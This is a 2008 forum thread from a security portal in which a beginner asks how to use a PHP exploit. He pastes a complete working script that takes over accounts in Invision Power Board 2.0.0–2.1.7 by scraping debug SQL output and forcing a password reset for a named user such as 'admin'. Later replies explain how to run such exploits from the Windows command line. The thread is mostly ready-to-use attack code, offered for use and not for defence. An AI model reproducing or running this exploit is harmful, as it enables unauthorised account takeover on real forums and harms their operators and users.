|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Using PHP Exploits ? |
|
Posted: Thu Jul 17, 2008 7:49 pm |
|
|
W4133D |
Beginner |
|
|
Joined: Jul 17, 2008 |
Posts: 3 |
|
|
|
|
|
|
|
How do I use a php exploit ?
Code: | <?php
/*
Debug Mode password change vulnerability
Affects Invision Power Borard 2.0.0 to 2.1.7
by Rapigator
This works if:
"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on
In General Configuration of the forum software.
*/
// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";
// An existing user's login name
$name = "admin";
// The new password(3-32 characters)
$pass = "1234";
// You can use a proxy...
// $proxy = "1.2.3.4:8080";
// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode)) {
echo "Error: Probably not vulnerable, or no forum found";
exit;
}
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$regid}®_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
function change_pass($regcode,$regid,$vid,$userid) {
global $site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}®id={$regid}®_code={$regcode}&pass1={$pass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
# milw0rm.com [2006-11-01]
|
|
|
|
|
|
|
|
|
|
Posted: Thu Jul 17, 2008 8:10 pm |
|
|
mge |
Valuable expert |
|
|
Joined: Jul 16, 2008 |
Posts: 142 |
|
|
|
|
|
|
|
php is not only executable as a web server module but it also comes with a cli = command line interface.
just go into the command prompt, change into the directory with the script and enter the path to the php.exe in your php directory with the script name as a parameter, for example:
c:\php\php.exe script.php
you need to have php installed first, of course.
if you have the php directory in your PATH variable, you won't need to type the full path. php or php.exe would be sufficient. |
|
|
|
|
Posted: Thu Jul 17, 2008 8:14 pm |
|
|
W4133D |
Beginner |
|
|
Joined: Jul 17, 2008 |
Posts: 3 |
|
|
|
|
|
|
|
Ok, thanks helped out alot, and these exploits work just like perl exploits right ? |
|
|
|
|
Posted: Thu Jul 17, 2008 8:22 pm |
|
|
mge |
Valuable expert |
|
|
Joined: Jul 16, 2008 |
Posts: 142 |
|
|
|
|
|
|
|
i can't say for sure, i guess it says it all in the source code. i think so though |
|
|
|
|
|
rep |
|
Posted: Tue Jul 22, 2008 10:38 am |
|
|
set4s |
Beginner |
|
|
Joined: Jul 22, 2008 |
Posts: 1 |
|
|
|
|
|
|
|
why do sometimes php exploits act strange in windows cmd.. whe i use php exploit.php it outputs all the f.. source to the screen... is it because the exploit is broken or i have php misscofigured? |
|
|
|
|
www.waraxe.us Forum Index -> Php
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|